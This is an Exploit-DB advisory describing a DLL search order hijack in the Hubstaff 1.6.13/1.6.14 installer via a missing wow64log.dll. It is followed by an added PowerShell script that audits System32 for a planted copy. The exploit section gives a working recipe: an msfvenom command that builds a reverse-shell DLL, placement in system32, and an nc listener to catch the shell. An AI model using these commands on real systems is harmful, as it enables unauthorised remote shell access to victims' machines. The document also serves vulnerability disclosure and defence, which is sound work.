Hubstaff 1.6.14-61e5e22e – ‘wow64log’ DLL Search Order Hijacking

  • Author: Ahsan Azad
    Date: 2023-05-23
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/51461/
  • *#Exploit Title:* Hubstaff 1.6.14-61e5e22e - 'wow64log' DLL Search Order Hijacking
    *#Date:* 14/05/2023
    *#Exploit Author:* Ahsan Azad
    *#Vendor Homepage:* https://hubstaff.com/
    *#Software Link:* https://app.hubstaff.com/download
    *#Version:* 1.6.13, 1.6.14
    *#Tested On:* 64-bit operating system, x64-based processor
    
    *Description*
    Hubstaff is an employee work tracker with screenshots, timesheets, billing,
    in-depth reports, and more.
    
    During testing, it was found that the system32 subdirectory was missing a
    DLL named *wow64log.dll* that Hubstaff's setup file required during
    installation. Hence, using Metasploit's msfvenom to create a new
    wow64log.dll file, the tester was able to get a reverse shell locally.
    
    
    *Exploit*
    1- Generate a DLL file with the name wow64log.dll using the command:
    
    *msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<Port> -f dll -o wow64log.dll*
    
    2- Place the newly generated DLL in the *system32* directory.
    3- Start a listener on the attacker's console using:
    
    *nc -lnvp <port_used_while_generating_DLL>*
    
    4- Launch the exe.
    
    The reverse shell will be received as:
    
    
    *C:\Windows>*
    
    
    
    *Attachments (For the understanding of verification team)*
    1.png - Showing the wow64.dll was not found by the exe.
    
    2.png - Showing how the tester was able to generate a new DLL using msfvenom on
    port 1337.
    
    3.png - Showing a reverse connection received on the attacker's console
    at C:\Windows> by launching the exe.
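
A defender-side check for the condition described above, added here as an example and not part of the original advisory: it looks for a wow64log.dll in the native System32 directory and reports its signature, owner, hash and timestamps. The function names and verdict strings are hypothetical, and the script assumes that a stock Windows install ships no wow64log.dll.

```powershell
# Added example, not from the advisory: audit System32 for a planted wow64log.dll.
# Assumption: stock Windows ships no wow64log.dll, so any copy warrants review
# and a copy without a valid Authenticode signature is treated as suspicious.

function Get-NativeSystem32 {
    # A 32-bit PowerShell on 64-bit Windows is silently redirected from
    # System32 to SysWOW64; the Sysnative alias reaches the real directory.
    if ([Environment]::Is64BitOperatingSystem -and -not [Environment]::Is64BitProcess) {
        return (Join-Path $env:SystemRoot 'Sysnative')
    }
    return (Join-Path $env:SystemRoot 'System32')
}

function Test-Wow64LogDll {
    param([string]$Directory = (Get-NativeSystem32))

    $path = Join-Path $Directory 'wow64log.dll'
    if (-not (Test-Path -LiteralPath $path -PathType Leaf)) {
        return [pscustomobject]@{ Path = $path; Present = $false; Verdict = 'OK: not present' }
    }

    $file   = Get-Item -LiteralPath $path -Force
    $sig    = Get-AuthenticodeSignature -LiteralPath $path
    $signer = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '(none)' }
    $verdict = if ($sig.Status -eq 'Valid') {
        'REVIEW: present and signed, confirm the signer is expected'
    } else {
        'SUSPICIOUS: present without a valid signature'
    }

    [pscustomobject]@{
        Path            = $path
        Present         = $true
        Verdict         = $verdict
        SignatureStatus = $sig.Status
        Signer          = $signer
        Owner           = (Get-Acl -LiteralPath $path).Owner
        SHA256          = (Get-FileHash -LiteralPath $path -Algorithm SHA256).Hash
        CreatedUtc      = $file.CreationTimeUtc
        ModifiedUtc     = $file.LastWriteTimeUtc
    }
}

Test-Wow64LogDll | Format-List
```

The `-Directory` parameter lets the check be pointed at a test folder or a mounted disk image instead of the live System32.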